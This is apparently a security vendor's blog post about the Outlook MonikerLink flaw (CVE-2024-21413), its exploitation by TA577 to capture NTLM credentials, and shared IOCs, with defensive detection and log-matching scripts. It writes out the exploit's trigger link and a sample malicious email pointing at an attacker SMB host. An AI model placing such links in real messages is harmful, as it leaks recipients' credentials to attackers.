
Critical IOCs from Recent Outlook Exploit: Insights by SamurAI MDR   



Our SamurAI Managed Detection and Response (MDR) team has identified threat actors exploiting the recent Microsoft Outlook vulnerability, known as MonikerLink, and collecting the leaked credentials with Impacket's SMB server (smbserver.py). In this blog, we'll delve into the details of the vulnerability, explore how threat actors are leveraging it, and share over 200 Indicators of Compromise (IOCs) that our team has tracked over the past two months.

A new vulnerability in Microsoft Outlook, dubbed MonikerLink (CVE-2024-21413, CVSS 9.8/10), was discovered and disclosed by Check Point Research. Successful exploitation leaks the victim's NTLM authentication material: when Outlook follows the crafted link to an attacker-controlled UNC path, Windows transparently authenticates to that host, and the attacker captures the Net-NTLMv2 challenge/response. That response cannot be replayed directly in a pass-the-hash attack, but it can be cracked offline to recover the password or relayed to other services that accept NTLM. Because the same bug also bypasses Outlook's Protected View, chaining CVE-2024-21413 with another vulnerability can lead to Remote Code Execution (RCE) on the victim's system.

In a rapid response to Check Point's disclosure, the security researcher known as "Xaitax" published a proof of concept (PoC) on GitHub just two days later. The PoC sends an email containing a MonikerLink payload; once the recipient clicks the link, their machine authenticates to the attacker's SMB server and the NTLM credentials are captured there.

Remarkably, Xaitax's GitHub page also states that they achieved Remote Code Execution (RCE) with the bug. Understanding the damage that could be done if malicious actors obtained it, Xaitax chose not to release the RCE PoC.
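The MonikerLink trigger is a `file:` hyperlink to a UNC path whose target carries a `!` separator, for example `file:///\\203.0.113.5\share\invoice.rtf!open`; the `!` makes Outlook treat the path as a composite moniker and skip Protected View, and the UNC host is where the NTLM authentication goes. The script below is an added example (not code from this post, from Check Point or from Xaitax's PoC) that scans HTML email bodies for such links and reports the host a click would authenticate to. The sample messages are constructed; the regex and the drive-letter heuristic are our own assumptions about the link shapes worth flagging.

```python
"""Flag MonikerLink-style hyperlinks (CVE-2024-21413) in HTML mail bodies.

Added example for this post; not code from Check Point or Xaitax.
A hit is any file: URL whose path contains a '!' separator. Hits whose
host is a UNC host (not a local drive letter) are the ones that leak NTLM
credentials to that host when clicked.
"""
import re
from dataclasses import dataclass
from html.parser import HTMLParser

# file:///\\host\share\doc.rtf!moniker  or  file://host/share/doc.rtf!moniker
MONIKER_RE = re.compile(
    r"^file:[\\/]*(?P<host>[^\\/!]+)[\\/](?P<path>[^!]*)!(?P<moniker>.*)$",
    re.IGNORECASE,
)
DRIVE_RE = re.compile(r"[A-Za-z]:")  # a local drive letter, not a UNC host


@dataclass(frozen=True)
class MonikerHit:
    href: str
    host: str
    path: str
    moniker: str
    unc: bool  # True when clicking would authenticate to a remote host


class _HrefCollector(HTMLParser):
    """Collect href values of <a> tags; HTMLParser unescapes entities for us."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value.strip())


def classify_href(href):
    """Return a MonikerHit for a file: link with a '!' separator, else None."""
    m = MONIKER_RE.match(href)
    if not m:
        return None
    host = m.group("host")
    return MonikerHit(
        href=href,
        host=host,
        path=m.group("path"),
        moniker=m.group("moniker"),
        unc=DRIVE_RE.fullmatch(host) is None,
    )


def find_monikerlinks(html_body):
    """All MonikerLink-style hrefs in an HTML body, in document order."""
    collector = _HrefCollector()
    collector.feed(html_body)
    return [h for h in map(classify_href, collector.hrefs) if h is not None]


# Constructed sample messages (raw strings keep the backslashes literal).
SAMPLE_MALICIOUS = r"""<html><body>
<p>Please review the invoice below.</p>
<a href="file:///\\203.0.113.5\share\invoice.rtf!open">Open invoice</a>
</body></html>"""

SAMPLE_BENIGN = r"""<html><body>
<a href="https://example.com/docs/report!v2">Web link with a bang</a>
<a href="file:///\\fileserver\share\report.docx">Plain UNC link, no moniker</a>
</body></html>"""


if __name__ == "__main__":
    for hit in find_monikerlinks(SAMPLE_MALICIOUS):
        kind = "UNC (NTLM leak to host)" if hit.unc else "local path"
        print(f"MonikerLink hit: host={hit.host} path={hit.path} [{kind}]")
    print("benign hits:", find_monikerlinks(SAMPLE_BENIGN))
```

Run it over exported `.eml`/HTML bodies at the mail gateway or in a sandbox; the `host` field of a UNC hit is a ready-made block/hunt indicator, and a plain UNC link without `!` is deliberately not flagged because it still lands in Protected View.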

Just a week after the PoC's release, the SamurAI MDR team detected TA577 actively exploiting the MonikerLink vulnerability. A financially motivated cybercrime group and a major Qakbot affiliate, TA577 wasted no time in adopting the new exploit. Qakbot, which first surfaced around 2008 as a banking trojan, has evolved into a key component of ransomware operations; its infections often serve as precursors to ransomware deployments, including the notorious Black Basta.

TA577 used Impacket's smbserver.py to capture NTLM credentials from its victims. The SamurAI MDR team has been closely monitoring Impacket SMB server activity across multiple OSINT (Open Source Intelligence) platforms and is sharing its findings with the cybersecurity community: we've compiled over 200 IOCs on our GitHub. Each IOC carries timestamps for the observed SMB server activity. Because these servers are typically short-lived hosts on rented infrastructure that is later reassigned, matching only connections that fall inside an indicator's active window significantly reduces false positives compared with matching on the address alone.
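The following is an added example, not a script from this post or from the SamurAI IOC repository, showing how time-bounded IOCs are applied to outbound SMB connection logs. The IOC records (indicator, first seen, last seen), the two-day grace window and the firewall log format are all constructed for the example; substitute your own export and the real IOC list.

```python
"""Match outbound SMB connections against time-bounded SMB server IOCs.

Added example; the IOC entries, grace window and log lines are constructed
and are not taken from the SamurAI GitHub list. A destination that matches
an indicator fires as "match" only when the connection time falls inside the
indicator's observed activity window (plus a grace period); connections to
the same address outside that window are reported as "stale" so an analyst
can triage them separately instead of treating them as confirmed hits.
"""
import re
from datetime import datetime, timedelta, timezone

# Constructed IOC records: (indicator, first_seen, last_seen), UTC.
IOCS = [
    ("203.0.113.5", "2024-02-22T00:00:00Z", "2024-02-29T23:59:59Z"),
    ("198.51.100.77", "2024-03-01T00:00:00Z", "2024-03-03T12:00:00Z"),
]
GRACE = timedelta(days=2)  # tolerance around the observed window (assumption)
SMB_PORTS = {"445", "139"}

# Constructed firewall export: "<ts> src=<ip> dst=<ip> dport=<port> ..."
LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)\b.*$"
)


def parse_ts(text):
    """Parse an ISO-8601 'Z' timestamp into an aware UTC datetime."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def build_index(iocs):
    """Map indicator -> (first_seen, last_seen) as datetimes."""
    return {ip: (parse_ts(first), parse_ts(last)) for ip, first, last in iocs}


def match_line(line, index, grace=GRACE):
    """Classify one log line: None (irrelevant), or a dict with a verdict."""
    m = LOG_RE.match(line)
    if not m or m["dport"] not in SMB_PORTS or m["dst"] not in index:
        return None
    ts = parse_ts(m["ts"])
    first, last = index[m["dst"]]
    inside = first - grace <= ts <= last + grace
    return {
        "ts": m["ts"],
        "src": m["src"],
        "dst": m["dst"],
        "verdict": "match" if inside else "stale",
    }


def scan(lines, iocs=IOCS, grace=GRACE):
    """Run every line through match_line and return the non-None results."""
    index = build_index(iocs)
    return [r for r in (match_line(l, index, grace) for l in lines) if r]


# Constructed sample export: two hits inside windows, one stale, two noise.
SAMPLE_LOGS = [
    "2024-02-27T09:12:03Z src=10.0.0.12 dst=203.0.113.5 dport=445 proto=tcp action=allow",
    "2024-03-20T14:00:00Z src=10.0.0.40 dst=203.0.113.5 dport=445 proto=tcp action=allow",
    "2024-03-02T08:30:00Z src=10.0.0.9 dst=198.51.100.77 dport=445 proto=tcp action=allow",
    "2024-03-02T08:31:00Z src=10.0.0.9 dst=198.51.100.77 dport=443 proto=tcp action=allow",
    "2024-03-02T08:32:00Z src=10.0.0.9 dst=192.0.2.1 dport=445 proto=tcp action=allow",
]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOGS):
        print(f"{r['verdict']:5} {r['ts']} {r['src']} -> {r['dst']}:445")
```

Outbound SMB to the internet should be rare to begin with, so a "match" here is a strong signal that a user clicked a MonikerLink payload from the host in `src`; the "stale" verdict keeps a recycled address from paging the on-call engineer weeks after the attacker's server went away.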

Are you unsure if your business is safe and protected from cybercriminals? Let’s talk. 

By taking proactive measures and remaining vigilant, we can collectively defend against cyber threats and safeguard sensitive data from exploitation. Let's prioritize cybersecurity and work together to ensure a safer digital environment for all.